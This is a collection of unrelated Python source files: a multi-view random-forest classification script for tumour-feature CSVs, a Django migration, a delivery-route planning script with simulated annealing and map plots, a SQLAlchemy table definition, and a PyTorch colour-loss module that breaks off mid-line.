d[k]: s2=1 else: s2 = 0 s = s1*www + s2*(1-www) score = score + s dis[i][j] =dis[j][i] = score/n_trees X_features1 = np.transpose(dis) X_features2 = X_features1[train_indices] X_features3 = np.transpose(X_features2) return X_features3[train_indices],X_features3[test_indices],weight,pred,prob,clf """ def rf_dis(n_trees, X,Y,train_indices,test_indices,seed, wei): clf = RandomForestClassifier(n_estimators=500, random_state=seed, oob_score=True, n_jobs=1) clf = clf.fit(X[train_indices], Y[train_indices]) pred = clf.predict(X[test_indices]) prob = clf.predict_proba(X[test_indices]) weight =clf.oob_score_ #clf.score(X[test_indices], Y[test_indices]) #print(1 - clf.oob_score_) n_samples = X.shape[0] dis = np.zeros((n_samples,n_samples)) trees = clf.estimators_ www = wei for i in range(n_samples): dis[i][i] = 1 for k in range(len(trees)): pa = trees[k].decision_path(X) for i in range(n_samples): for j in range(i+1,n_samples): a = pa[i] a = a.toarray() a = np.ravel(a) b = pa[j] b = b.toarray() b = np.ravel(b) score = a == b d = score.sum()-len(a) dis[i][j] = dis[j][i] = dis[i][j]+np.exp(www*d) dis = dis/n_trees X_features1 = np.transpose(dis) X_features2 = X_features1[train_indices] X_features3 = np.transpose(X_features2) return X_features3[train_indices],X_features3[test_indices],weight,pred,prob,clf def gama_patatune(train_x,train_y,c): tuned_parameters = [ {'kernel': ['rbf'], 'gamma': [0.0625, 0.125,0.25, 0.5, 1, 2, 5 ,7, 10, 12 ,15 ,17 ,20] }] clf = GridSearchCV(SVC(C=c), tuned_parameters, cv=5, n_jobs=1 ) # SVC(probability=True)#SVC(kernel="linear", probability=True) clf.fit(train_x, train_y) return clf.best_params_['gamma'] def relf(n_neb, n_feat, trainx, trainy,testx): fs = ReliefF(n_features_to_select=n_feat, n_neighbors=n_neb,discrete_threshold=10, n_jobs=1) fs.fit(trainx, trainy) ind = fs.transform(trainx) return ind def lsvm_rfe(c,n_feat,trainX,trainy, testX): svc = SVC(kernel="linear", C=c) rfe = RFE(estimator=svc, n_features_to_select=n_feat, step=1) rfe.fit(trainX, trainy) train_X = rfe.transform(trainX) test_X = rfe.transform(testX) return train_X,test_X def RF(n_trees, seed, train_x, train_y, test_x, test_y): clf = RandomForestClassifier(n_estimators=n_trees, random_state = seed, oob_score=True) clf = clf.fit(train_x,train_y) oob_error = 1 - clf.oob_score_ test_error = clf.score(test_x,test_y) test_auc = clf.predict_proba(test_x) #filename = './tmp1/RF_%d_.pkl'%seed #_ = joblib.dump(clf, filename, compress=9) return test_error, test_auc def selected_f(n_features): if n_features>1000: n = 25 elif n_features>100: n = int(n_features*0.03) elif n_features >75: n = int(n_features * 0.1) else : n = int(n_features * 0.4) return n def nLsvm_patatune(train_x,train_y,test_x, test_y): tuned_parameters = [ {'kernel': ['precomputed'], 'C': [0.01, 0.1, 1, 10, 100, 1000]}] clf = GridSearchCV(SVC(C=1), tuned_parameters, cv=5, n_jobs=1 ) # SVC(probability=True)#SVC(kernel="linear", probability=True) clf.fit(train_x, train_y) #print(clf.score(test_x,test_y)) return clf.best_params_['C'] def Lsvm_patatune(train_x,train_y): tuned_parameters = [ {'kernel': ['linear'], 'C': [0.01,0.1, 1, 10, 100, 1000]}] clf = GridSearchCV(SVC(C=1, probability=True), tuned_parameters, cv=5, n_jobs=1 ) # SVC(probability=True)#SVC(kernel="linear", probability=True) clf.fit(train_x, train_y) return clf.best_params_['C'] def weightedComb(Y, W): y = Y.astype(int) y_bin = np.bincount(y) classes = np.nonzero(y_bin)[0] # fint the indices for each class indices = [] for i in classes: pro = 0 indice = [] for j in range(len(y)): if y[j] == i: indice.append(j) pro = pro + W[j] indices.append(pro) ind = (list(indices)).index(max(indices)) return classes[ind] url = 'text_pr_1.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X = array Y = pandas.read_csv('label_progression.csv', header=None) Y = Y.values Y = np.ravel(Y) print(Y.shape) for i in range(4): url = 'text_pr_' + str(i + 2) + '.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X1 = array print(X1.shape) X = np.concatenate((X, X1), axis=1) Progression = X Progression1 = X[:, 0:1680] Progression2 = X[:, 1680:3360] Progression3 = X[:, 3360:5040] Progression4 = X[:, 5040:6720] Progression5 = X[:, 6720:6745] ProgressionY = Y url = 'text_lg_1.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X = array Y = pandas.read_csv('label_lowGrade.csv', header=None) Y = Y.values Y = np.ravel(Y) print(Y.shape) for i in range(4): url = 'text_lg_' + str(i + 2) + '.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X1 = array print(X1.shape) X = np.concatenate((X, X1), axis=1) lowGrade = X lowGrade1 = X[:, 0:1680] lowGrade2 = X[:, 1680:3360] lowGrade3 = X[:, 3360:5040] lowGrade4 = X[:, 5040:6720] lowGrade5 = X[:, 6720:6745] lowGradeY = Y url = 'text_nonIDH1_1.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X = array Y = pandas.read_csv('label_nonIDH1.csv', header=None) Y = Y.values Y = np.ravel(Y) print(Y.shape) for i in range(4): url = 'text_nonIDH1_' + str(i + 2) + '.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X1 = array print(X1.shape) X = np.concatenate((X, X1), axis=1) nonIDH=X nonIDH1 = X[:, 0:1680] nonIDH2 = X[:, 1680:3360] nonIDH3 = X[:, 3360:5040] nonIDH4 = X[:, 5040:6720] nonIDH5 = X[:, 6720:6745] nonIDHY = Y url = 'text_id_1.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X = array Y = pandas.read_csv('label_IDHCodel.csv', header=None) Y = Y.values Y = np.ravel(Y) print(Y.shape) for i in range(4): url = 'text_id_' + str(i + 2) + '.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X1 = array print(X1.shape) X = np.concatenate((X, X1), axis=1) IDHCodel=X IDHCodel1 = X[:, 0:1680] IDHCodel2 = X[:, 1680:3360] IDHCodel3 = X[:, 3360:5040] IDHCodel4 = X[:, 5040:6720] IDHCodel5 = X[:, 6720:6745] IDHCodelY = Y def mcode(ite): R = 0.5 seed = 1000 + ite numberofclass = 2 for ddd in range(4): if ddd ==0: X = IDHCodel Y = IDHCodelY fff = "SPBKNDIDHCodelwww4%f_%f" % (R, ite) if ddd ==1: X = nonIDH Y = nonIDHY fff = "SPBKNDnonIDHwww4%f_%f" % (R, ite) if ddd ==2: X = lowGrade Y = lowGradeY fff = "SPBKNDLGwww4%f_%f" % (R, ite) if ddd ==3: X = Progression Y = ProgressionY fff ="SPBKNDprwww4%f_%f" % (R, ite) Xnew1 = X[:, 0:1680] Xnew2 = X[:, 1680:3360] Xnew3 = X[:, 3360:5040] Xnew4 = X[:, 5040:6720] Xnew5 = X[:, 6720:6745] train_indices, test_indices = splitdata(X=X, Y=Y, ratio=R, seed=seed) for ii in range(20): fn = fff+"ite%d"%(ii)+".txt" testfile = open(fn, 'w') ndw = 0.1*(ii+1) X_features_train1, X_features_test1, w1, pred1, prob1, RFV1 = rf_dis(n_trees=500, X=Xnew1, Y=Y, train_indices=train_indices, test_indices=test_indices, seed=seed, wei=ndw) X_features_train2, X_features_test2, w2, pred2, prob2, RFV2 = rf_dis(n_trees=500, X=Xnew2, Y=Y, train_indices=train_indices, test_indices=test_indices, seed=seed, wei=ndw) X_features_train3, X_features_test3, w3, pred3, prob3, RFV3 = rf_dis(n_trees=500, X=Xnew3, Y=Y, train_indices=train_indices, test_indices=test_indices, seed=seed, wei=ndw) X_features_train4, X_features_test4, w4, pred4, prob4, RFV4 = rf_dis(n_trees=500, X=Xnew4, Y=Y, train_indices=train_indices, test_indices=test_indices, seed=seed, wei=ndw) X_features_train5, X_features_test5, w5, pred5, prob5, RFV5 = rf_dis(n_trees=500, X=Xnew5, Y=Y, train_indices=train_indices, test_indices=test_indices, seed=seed, wei=ndw) # multi view X_features_trainm = ( X_features_train1 + X_features_train2 + X_features_train3 + X_features_train4 + X_features_train5) / 5 X_features_testm = ( X_features_test1 + X_features_test2 + X_features_test3 + X_features_test4 + X_features_test5) / 5 mv = RandomForestClassifier(n_estimators=500, random_state=seed, oob_score=True, n_jobs=1).fit( X_features_trainm, Y[train_indices]) R1=(mv.score(X_features_testm, Y[test_indices])) # RFSVM c = nLsvm_patatune(train_x=X_features_trainm, train_y=Y[train_indices], test_x=X_features_testm, test_y=Y[test_indices]) clf = SVC(C=c, kernel='precomputed') clf.fit(X_features_trainm, Y[train_indices]) R2=(clf.score(X_features_testm, Y[test_indices])) """ # W multi view X_features_trainm = ( X_features_train1*W[0] + X_features_train2*W[1] + X_features_train3*W[2] + X_features_train4*W[3] + X_features_train5*W[4]) / 5 X_features_testm = ( X_features_test1*W[0] + X_features_test2*W[1] + X_features_test3*W[2] + X_features_test4*W[3] + X_features_test5*W[4]) / 5 mv = RandomForestClassifier(n_estimators=500, random_state=seed, oob_score=True, n_jobs=1).fit( X_features_trainm, Y[train_indices]) R3=(mv.score(X_features_testm, Y[test_indices])) # RFSVM c = nLsvm_patatune(train_x=X_features_trainm, train_y=Y[train_indices], test_x=X_features_testm, test_y=Y[test_indices]) clf = SVC(C=c, kernel='precomputed') clf.fit(X_features_trainm, Y[train_indices]) R4=(clf.score(X_features_testm, Y[test_indices])) # weight multi view X_features_trainm = ( X_features_train1 * weight[0] + X_features_train2 * weight[1] + X_features_train3 * weight[ 2] + X_features_train4 * weight[3] + X_features_train5 * weight[4]) / 5 X_features_testm = ( X_features_test1 * weight[0] + X_features_test2 * weight[1] + X_features_test3 * weight[ 2] + X_features_test4 * weight[3] + X_features_test5* weight[4]) / 5 mv = RandomForestClassifier(n_estimators=500, random_state=seed, oob_score=True, n_jobs=1).fit( X_features_trainm, Y[train_indices]) R5=(mv.score(X_features_testm, Y[test_indices])) # RFSVM c = nLsvm_patatune(train_x=X_features_trainm, train_y=Y[train_indices], test_x=X_features_testm, test_y=Y[test_indices]) clf = SVC(C=c, kernel='precomputed') clf.fit(X_features_trainm, Y[train_indices]) R6=(clf.score(X_features_testm, Y[test_indices])) """ testfile.write(" R1&%s pm%s &" % (floored_percentage(np.mean(R1), 2), floored_percentage(np.std(R1), 2)) + '\n') testfile.write(" R2&%s pm%s &" % (floored_percentage(np.mean(R2), 2), floored_percentage(np.std(R2), 2)) + '\n') #testfile.write(" R3&%s pm%s &" % (floored_percentage(np.mean(R3), 2), floored_percentage(np.std(R3), 2)) + '\n') #testfile.write(" R4&%s pm%s &" % (floored_percentage(np.mean(R4), 2), floored_percentage(np.std(R4), 2)) + '\n') #testfile.write(" R5&%s pm%s &" % (floored_percentage(np.mean(R5), 2), floored_percentage(np.std(R5), 2)) + '\n') #testfile.write(" R6&%s pm%s &" % (floored_percentage(np.mean(R6), 2), floored_percentage(np.std(R6), 2)) + '\n') testfile.close() if __name__ == '__main__': Parallel(n_jobs=10)(delayed(mcode)(ite=i) for i in range(10))
nilq/baby-python
python
# Generated by Django 3.0.8 on 2020-08-29 14:04 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('bugtrack', '0014_user_notification'), ] operations = [ migrations.AddField( model_name='bug', name='notifType', field=models.CharField(blank=True, default='none', max_length=50, null=True), ), ]
nilq/baby-python
python
# -*- coding: utf-8 -*- import shutil import locm, routem, mapm, dropboxm, gmaps, tools, bokehm, tspm import logging.config, os, yaml, inspect import time, math import numpy as np tver_coords = {u'lat':56.8583600,u'lng':35.9005700} ryazan_coords = {u'lat':54.6269000,u'lng':39.6916000} def setup_logging( default_path='app_logging.yaml', default_level=logging.INFO, env_key='LOG_CFG' ): """Setup logging configuration """ path = default_path value = os.getenv(env_key, None) if value: path = value if os.path.exists(path): with open(path, 'rt') as f: config = yaml.load(f.read()) logging.config.dictConfig(config) else: logging.basicConfig(level=default_level) def get_tsp_params_list(cities_coords_fname): # setting up tsp module move_operator_name = "swapped_cities" max_itterations = 10000 # test value # max_itterations = 1000000 # best value alg_type = "anneal" start_temp = 100 # best value alpha = 0.99 # best value cooling_str = ''.join([str(start_temp),':',str(alpha)]) cities_coords_fname = cities_coords_fname tsp_params_list = ['tspm.py','-m',move_operator_name,'-n',max_itterations,'-a',alg_type,'--cooling',cooling_str,cities_coords_fname] return tsp_params_list def generate_locations(cities_fname): with open(cities_fname,'r') as cities_file: address_list = [line.strip() for line in cities_file.readlines()] locs_list = [locm.Location(addr) for addr in address_list] moscow = locm.Location(address='Moscow') nodes_coords_list = [tver_coords] + [loc.coords for loc in locs_list] + [ryazan_coords] # nodes_coords_list = [moscow.coords] + [loc.coords for loc in locs_list] + [moscow.coords] return locs_list, nodes_coords_list def put_locs_to_file(nodes_coords_list, fname): with open(fname,'w') as coords_file: for coord_pair_dict in nodes_coords_list: coords_file.write("%f" % coord_pair_dict[u'lat']) coords_file.write(',') coords_file.write("%f" % coord_pair_dict[u'lng']) coords_file.write("\n") def read_coords_from_file(fname): with open(fname,'r') as coords_file: nodes_coords_list_of_lists = [line.strip().split(',') for line in coords_file] nodes_coords_list = [{u'lat':float(l[0]),u'lng':float(l[1])}for l in nodes_coords_list_of_lists] return nodes_coords_list def try_to_guess_routes(): cities_fname = 'test_city_names_list_100.txt' # cities_fname = 'test_city_names_list_21.txt' # cities_fname = 'test_city_names_list.txt' # cities_fname = 'cities_from_dropbox.txt' FILE_WITH_COORDS_PAIRS_NAME = "cities_coords.txt" moscow = locm.Location(address='Moscow') ## run this when need to update cities coords / change cities list # locs_list, nodes_coords_list = generate_locations() # put_locs_to_file(nodes_coords_list,fname = FILE_WITH_COORDS_PAIRS_NAME) ## routes_list = [routem.Route(moscow.coords,dest.coords) for dest in locs_list] ## for route,loc in zip(routes_list,locs_list): ## print(loc.address) ## print(route.to_str()) # run this to only prepare the tsp test nodes_coords_list = read_coords_from_file(FILE_WITH_COORDS_PAIRS_NAME) # only variable nodes` coords here tsp_params_list = get_tsp_params_list(FILE_WITH_COORDS_PAIRS_NAME) import sys logger.error("max_itterations = %d" % (tsp_params_list[4])) sys.argv = tsp_params_list result_tuple = tspm.main() locs_coords_list = [nodes_coords_list[index] for index in result_tuple[-1]] plot_fname = 'othodi_app_test_%d_%f.html' % (len(nodes_coords_list),result_tuple[1]) fig_on_gmap = bokehm.Figure(output_fname=plot_fname,use_gmap=True, center_coords=nodes_coords_list[0]) # fig_on_gmap.add_line(locs_coords_list,circle_size=1, circles_color='red',alpha=1.) # fig_on_gmap.add_line([nodes_coords_list[0]],circle_size=35, circles_color='green',alpha=0.5) # fig_on_gmap.save2html() # fig_on_gmap.show() cars_num = 5 # # cities_num=100 only_var_nodes = locs_coords_list[1:-1] cities_num=(len(only_var_nodes)) cities_per_car = cities_num//cars_num print("cities_per_car=%d" % cities_per_car) parts = [only_var_nodes[car_i*cities_per_car : (car_i+1)*cities_per_car] for car_i in range(cars_num)] parts_indeces = [range(car_i*cities_per_car,(car_i+1)*cities_per_car,1) for car_i in range(cars_num)] # print(parts_indeces) # print(parts) best_scores_list = [] best_routes_list = [] colors_list = ["red","green","blue","orange","pink"] # parts_with_start_finish = [[nodes_coords_list[0]] + part + [nodes_coords_list[-1]] for part in parts] put_locs_to_file(locs_coords_list[1:-1],fname = "cities_coords_all_in_order.txt") for i,part in enumerate(parts): part_coords_file_name = "cities_coords_part_%d.txt" % (i) put_locs_to_file(part,fname = part_coords_file_name) logger.info("reading var nodes` coords from file - one car route evaluation") nodes_coords_list = read_coords_from_file(part_coords_file_name) # only variable nodes` coords here tsp_params_list = get_tsp_params_list(part_coords_file_name) import sys sys.argv = tsp_params_list logger.info("starting part route evaluation") result_tuple = tspm.main() logger.info("preparing list of dicts of coords for plotting") locs_coords_list = [tver_coords]+[nodes_coords_list[index] for index in result_tuple[-1]] + [ryazan_coords] # locs_coords_list = [moscow.coords]+[nodes_coords_list[index] for index in result_tuple[-1]]+[moscow.coords] # fig_on_gmap = bokehm.Figure(output_fname='o_part_%d_ncities_%d_%f.html' % (i,len(part),result_tuple[1]),use_gmap=True, center_coords=nodes_coords_list[0]) circle_sizes = [(i*3) for index in locs_coords_list] fig_on_gmap.add_line(locs_coords_list,circle_size=circle_sizes, circles_color=colors_list[i],alpha=0.5) # fig_on_gmap.add_line([nodes_coords_list[0]],circle_size=35, circles_color=colors_list[i],alpha=0.5) logger.error("a car route: part %d ncities=%d length=%f" % (i,len(part),result_tuple[1])) best_scores_list.append(result_tuple[1]) best_routes_list.append(result_tuple[-1]) fig_on_gmap.save2html() return best_scores_list,best_routes_list,plot_fname def r(c1,c2): def convert(c): if type(c)!=type({}): return {'lat':c[0],'lng':c[1]} return c c1,c2 = convert(c1),convert(c2) return math.sqrt((c2['lat']-c1['lat'])**2 + (c2['lng']-c1['lng'])**2) def create_potential_list(coords_tuples,start_coords,finish_coords): '''create a potential list for every city''' potential_list=[] xs,xf = start_coords['lat'],finish_coords['lat'] ys,yf = start_coords['lng'],finish_coords['lng'] for i,(x,y) in enumerate(coords_tuples): dxs,dys=x-xs,y-ys dxf,dyf=xf-x,yf-y potential=math.sqrt(dxs*dxs + dys*dys)+math.sqrt(dxf*dxf + dyf*dyf) potential_list.append(potential) return potential_list def create_coords_dicts_lists(node_dtype_routes): coords_dicts_lists = np.empty(node_dtype_routes.shape,dtype = [('lat',np.float64,1),('lng',np.float64,1)]) for route_n, part in enumerate(node_dtype_routes['coords']): coords_dicts_lists[route_n]['lat'] = [pair[0] for pair in part] coords_dicts_lists[route_n]['lng'] = [pair[1] for pair in part] return coords_dicts_lists if __name__ == "__main__": setup_logging() logger = logging.getLogger(__name__) func_name, func_args = inspect.stack()[0][3], inspect.getargvalues(inspect.currentframe())[3] # caller_name, func_name, func_args = inspect.stack()[1][3], inspect.stack()[0][3], inspect.getargvalues(inspect.currentframe())[3] logger.debug(" %s with args = %s" % (func_name, func_args)) logger.info("Main skript started") CITIES_FNAME = 'test_city_names_list_100.txt' with open(CITIES_FNAME,'r') as cities_file: names = [addr.strip() for addr in cities_file.readlines()] # locs_list = [locm.Location(addr.strip()) for addr in cities_file.readlines()] # nodes_coords_list = [loc.coords for loc in locs_list] FILE_WITH_COORDS_PAIRS_NAME = "c_pairs_"+CITIES_FNAME # put_locs_to_file(nodes_coords_list,fname = FILE_WITH_COORDS_PAIRS_NAME) nodes_clist = read_coords_from_file(FILE_WITH_COORDS_PAIRS_NAME) # only variable nodes` coords here # calc potetial nodes_clist_of_tuples = [tuple(d.values()) for d in nodes_clist] cm = tspm.cartesian_matrix(nodes_clist_of_tuples) r_to_start_list = [r(tver_coords,node_cd) for node_cd in nodes_clist] # создание несортированного списка узлов-городов-точек unsorted_nodes = [] pl = create_potential_list(nodes_clist_of_tuples,tver_coords,ryazan_coords) for pot, name,i,c_dict,r_s in zip(pl,names,range(len(names)),nodes_clist,r_to_start_list): # print("%d:%s %.3f %s" % (i,name, pot,str(c_dict))) if len(name)!=0 and pot!=0 and len(c_dict)!=0: unsorted_nodes.append((i,name,pot,c_dict.values(),r_s)) # создание и сортировка списка узлов с потенциалами node_dtype = dt = np.dtype([('idx', np.int32, 1), ('name',np.str_, 16), ('potential', np.float64, 1), ('coords', np.float64, 2),('rs',np.float64,1)]) pln = np.array(unsorted_nodes,dtype = node_dtype) pln.sort(order = 'potential') # sorted by potential # разбиение соритрованного списка на части по возрастанию потенциала n_cars = 5 n_nodes = len(pln) n_per_route = n_nodes//n_cars splitted_pln = np.split(pln,n_per_route) # print(splitted_pln[0]) # выделение ниток маршрутов для каждой машины car_routes = np.empty((n_cars,n_per_route),dtype = node_dtype) for part_num, split_part in enumerate(splitted_pln): next_nodes = np.copy(split_part) print("next_nodes before sorting by proximity to prev node") print(next_nodes) next_nodes_arb_rs = [] for node in next_nodes: next_nodes_arb_rs.append(r(car_routes[car_number][part_num-1]['coords'],node['coords'])) next_nodes['rs'] = next_nodes_arb_rs next_nodes.sort(order = 'rs') print("next_nodes after sorting by proximity to prev node") print(next_nodes) for car_number in range(n_cars): print("car number %d" % car_number) if part_num == 0: # сначала просто по порядку, car_routes[car_number][part_num] = split_part[car_number] else: # затем - ближайшие из каждой "эквипотенциальной" части car_routes[car_number][part_num] = next_nodes[0] # восстанавливаю поле rs для выстраивания маршрута по расстоянию от пункта отправления car_routes[car_number][part_num]['rs'] = split_part[0]['rs'] # print(car_routes[0]) print(len(car_routes[0])) print(len(car_routes[1])) print(len(car_routes[2])) print(len(car_routes[3])) print(len(car_routes[4])) # print(car_routes['coords'][0][:,0]) # print(car_routes['coords'][0][:,1]) # print(r(tver_coords,ryazan_coords)) # print(r(tver_coords,car_routes['coords'][0][0])) # print(car_routes['rs']) for car_route in car_routes: car_route.sort(order = 'rs') # print(car_routes['rs']) routes_coords_dicts_lists = create_coords_dicts_lists(car_routes) moscow = locm.Location(address='Moscow') fig_on_gmap = bokehm.Figure(output_fname='threads_pot_sorted_nearest.html',use_gmap=True, center_coords=moscow.coords) circle_sizes = 10 colors_list = ['red','green','blue','orange','yellow'] for car_number in range(n_cars): fig_on_gmap.add_line(routes_coords_dicts_lists[car_number],circle_size=circle_sizes, circles_color=colors_list[car_number],alpha=1.) fig_on_gmap.show() import sys sys.exit(0) # t_start = time.time() # best_scores,nearest_routes,plot_file_name = [],[],"" # # stdev_of_length = 10. # # mean_length = -100. # while True: # best_scores,nearest_routes,plot_file_name = try_to_guess_routes() # arr = np.array(best_scores) # logger.error("mean_best_score = %.4f +- %.4f" % (float(np.mean(arr, axis=0)), float(np.std(arr, axis=0)))) # stdev_of_length=float(np.std(arr, axis=0)) # mean_length=float(np.mean(arr, axis=0)) # if stdev_of_length<1. and mean_length>-10.: break # t_stop = time.time() # delta_t = t_stop - t_start # logger.error("route with small stdev plotted: %s, time elapsed=%.2f seconds" % (plot_file_name,delta_t))
nilq/baby-python
python
# -*- coding: utf-8 -*- """ In the test, we assume: - id_col: id, string, generated by ``import uuid`` - sort_col: time, datetime """ from __future__ import division from sqlalchemy import MetaData, Table, Column from sqlalchemy import String, DateTime table_name = "events" id_col_name = "id" sort_col_name = "time" metadata = MetaData() t_events = Table( table_name, metadata, Column(id_col_name, String), Column(sort_col_name, DateTime), )
nilq/baby-python
python
import time import numpy as np import torch import torch.nn as nn import torch.nn.functional as F import chamfer from torch.autograd import Function from util.sampler import sampler, sampler_color, sampler_uv, uv2color from torch.autograd import Variable class RGBPriorLoss(nn.Module): def __init__(self, options): super(RGBPriorLoss, self).__init__() self.options = options self.chamfer_dist = ChamferDist() self.delta_vc = None self.meshes = self.mesh = None self.pred_texture = None self.device = None self.pred_vc = [] self.pre_uvs = [] self.vc_gt = None self.pred_coord = [] self.w_chamfer = options.weight_chamfer self.w_chamfer_op = options.weight_chamfer_opposite self.l2_loss = nn.MSELoss(reduction='mean') self.part_n = None def forward(self, output, targets, faces_gt, colors, hr_texture, lr_texture, gt_texture, uvs_gt, face_uvs_gt): self.pred_texture = hr_texture[0] consistent_loss = edge_loss = texture_chamfer_loss = lap_loss = beam_loss = area_loss = 0 # for i,mesh in enumerate(self.meshes): self.mesh = np.asarray([self.meshes[self.part_n]]) self.delta_vc = self.delta_e2c(output) pred_coord = torch.tensor(self.mesh[0].vs, dtype=torch.float, device=self.device) if colors is not None else None uvs_gt = torch.tensor(uvs_gt[self.part_n], dtype=torch.float, device=self.device) if uvs_gt is not None else None face_uvs_gt = torch.tensor(face_uvs_gt[self.part_n], dtype=torch.long, device=self.device).unsqueeze(0) if uvs_gt is not None else None vc_gt = torch.tensor(colors[self.part_n], dtype=torch.float, device=self.device) if self.options.texture: self.vc_gt = vc_gt = uv2color(vc_gt[:, :2], gt_texture) # save_obj(targets[self.part_n], faces_gt[self.part_n], '', 'tmp.obj', colors=vc_gt.detach().cpu().numpy()) f_gt = torch.tensor(faces_gt[self.part_n], dtype=torch.long, device=self.device).unsqueeze(0) gt_coord = torch.tensor(targets[self.part_n], device=self.device).float() pred_vc = self.delta_vc + 0.5 pred_coord = pred_coord.unsqueeze(0) if len(self.pred_coord) < self.options.batch_size: self.pred_coord.append(pred_coord) # self.pred_vc.append(pred_vc.unsqueeze(0)) # else: self.pred_coord[self.part_n] = pred_coord self.pred_vc[self.part_n] = pred_vc.unsqueeze(0) faces = torch.tensor(self.mesh[0].faces, dtype=torch.long, device=self.device).unsqueeze(0) face_uvs = torch.tensor(self.mesh[0].face_uvs, dtype=torch.long, device=self.device).unsqueeze(0) uvs = torch.tensor(self.mesh[0].uvs, dtype=torch.float, device=self.device) # if len(self.pred_uvs) < self.options.batch_size and uvs_gt is not None: # self.pre_uvs.append(sample_uv[0][idx2[0].long()]) sample_num = pred_vc.shape[0] * 10 # print(sample_num) if self.options.sample_gt: sampler_coord, sample_norm, sample_vc = sampler_color(f_gt, gt_coord.unsqueeze(0), sample_num, colors=vc_gt.unsqueeze(0), bypass=self.options.no_sample) dist1, dist2, idx1, idx2 = self.chamfer_dist(sampler_coord, self.pred_coord[self.part_n]) gt_color = sample_vc[0][idx2[0].long()] pre_color = pred_vc[idx1[0].long()] chamfer_loss = self.w_chamfer * torch.mean(torch.abs(pred_vc - gt_color)) + \ self.w_chamfer_op * torch.mean(torch.abs(pre_color - sample_vc)) loss = chamfer_loss elif self.options.texture: k = self.options.sample_gauss sigma = self.options.sample_sigma - self.options.sample_sigma * (self.options.cur_step % 500) / \ (500 * 2) sample_num = int(pred_vc.shape[0]) consistent_loss = self.cal_consistent_loss(faces[0], self.pred_vc[self.part_n][0], face_uvs[0], uvs, self.pred_texture) sample_coord, _, sample_uvs = sampler_uv(faces, self.pred_coord[self.part_n], sample_num, uvs=uvs.unsqueeze(0), face_uvs=face_uvs) sample_vc = uv2color(sample_uvs[0], self.pred_texture).unsqueeze(0) gt_coord = gt_coord.unsqueeze(0) pair_dist = self.pairwise_dist(gt_coord, sample_coord) # (B,M,N) sample_knn_dist, sample_knn_idx = pair_dist.topk(k, largest=False, dim=-1) gt_knn_dist, gt_knn_idx = pair_dist.topk(k, largest=False, dim=-2) gt_knn_idx = gt_knn_idx.permute(0, 2, 1).contiguous() gt_knn_dist = gt_knn_dist.permute(0, 2, 1).contiguous() gt_color = vc_gt[sample_knn_idx[0].view(-1)].view(-1, k, 3) gt_ratio = torch.exp(-(sample_knn_dist[0] / (2 * (sigma ** 2)))) mask = gt_ratio == 0 mask[:, 1:] = 0 gt_ratio[mask] = 1 gt_ratio = gt_ratio / torch.sum(gt_ratio, dim=-1, keepdim=True) gt_gauss_color = torch.sum(gt_color * gt_ratio.unsqueeze(-1), dim=1) pre_color = sample_vc[0][gt_knn_idx[0].view(-1)].view(-1, k, 3) pre_ratio = torch.exp(-(gt_knn_dist[0] / (2 * (sigma ** 2)))) mask = pre_ratio == 0 mask[:, 1:] = 0 pre_ratio[mask] = 1 pre_ratio = pre_ratio / torch.sum(pre_ratio, dim=-1, keepdim=True) pre_gauss_color = torch.sum(pre_color * pre_ratio.unsqueeze(-1), dim=1) texture_chamfer_loss = self.w_chamfer * torch.mean(torch.abs(sample_vc[0] - gt_gauss_color)) + \ self.w_chamfer_op * torch.mean(torch.abs(pre_gauss_color - vc_gt)) sample_coord, sample_norm, sample_vc = sampler_color(faces, self.pred_coord[self.part_n], sample_num, colors=self.pred_vc[self.part_n], bypass=self.options.no_sample) pair_dist = self.pairwise_dist(gt_coord, sample_coord) # (B,M,N) sample_knn_dist, sample_knn_idx = pair_dist.topk(k, largest=False, dim=-1) gt_knn_dist, gt_knn_idx = pair_dist.topk(k, largest=False, dim=-2) gt_knn_idx = gt_knn_idx.permute(0, 2, 1).contiguous() gt_knn_dist = gt_knn_dist.permute(0, 2, 1).contiguous() gt_color = vc_gt[sample_knn_idx[0].view(-1)].view(-1, k, 3) gt_ratio = torch.exp(-(sample_knn_dist[0] / (2 * (sigma ** 2)))) mask = gt_ratio == 0 mask[:, 1:] = 0 gt_ratio[mask] = 1 gt_ratio = gt_ratio / torch.sum(gt_ratio, dim=-1, keepdim=True) gt_gauss_color = torch.sum(gt_color * gt_ratio.unsqueeze(-1), dim=1) pre_color = sample_vc[0][gt_knn_idx[0].view(-1)].view(-1, k, 3) pre_ratio = torch.exp(-(gt_knn_dist[0] / (2 * (sigma ** 2)))) mask = pre_ratio == 0 mask[:, 1:] = 0 pre_ratio[mask] = 1 pre_ratio = pre_ratio / torch.sum(pre_ratio, dim=-1, keepdim=True) pre_gauss_color = torch.sum(pre_color * pre_ratio.unsqueeze(-1), dim=1) chamfer_loss = vertex_chamfer_loss = self.w_chamfer * torch.mean(torch.abs(sample_vc[0] - gt_gauss_color)) + \ self.w_chamfer_op * torch.mean(torch.abs(pre_gauss_color - vc_gt)) loss = consistent_loss + vertex_chamfer_loss + texture_chamfer_loss elif self.options.sample_gauss > 1: k = self.options.sample_gauss sigma = self.options.sample_sigma - self.options.sample_sigma * (self.options.cur_step % 500) / \ (500 * 2) sample_num = int(pred_vc.shape[0]) sample_coord, sample_norm, sample_vc = sampler_color(faces, self.pred_coord[self.part_n], sample_num, colors=self.pred_vc[self.part_n], bypass=self.options.no_sample) gt_coord = gt_coord.unsqueeze(0) pair_dist = self.pairwise_dist(gt_coord, sample_coord) # (B,M,N) sample_knn_dist, sample_knn_idx = pair_dist.topk(k, largest=False, dim=-1) gt_knn_dist, gt_knn_idx = pair_dist.topk(k, largest=False, dim=-2) gt_knn_idx = gt_knn_idx.permute(0, 2, 1).contiguous() gt_knn_dist = gt_knn_dist.permute(0, 2, 1).contiguous() gt_color = vc_gt[sample_knn_idx[0].view(-1)].view(-1, k, 3) gt_ratio = torch.exp(-(sample_knn_dist[0] / (2 * (sigma ** 2)))) mask = gt_ratio == 0 mask[:, 1:] = 0 gt_ratio[mask] = 1 gt_ratio = gt_ratio / torch.sum(gt_ratio, dim=-1, keepdim=True) gt_gauss_color = torch.sum(gt_color * gt_ratio.unsqueeze(-1), dim=1) pre_color = 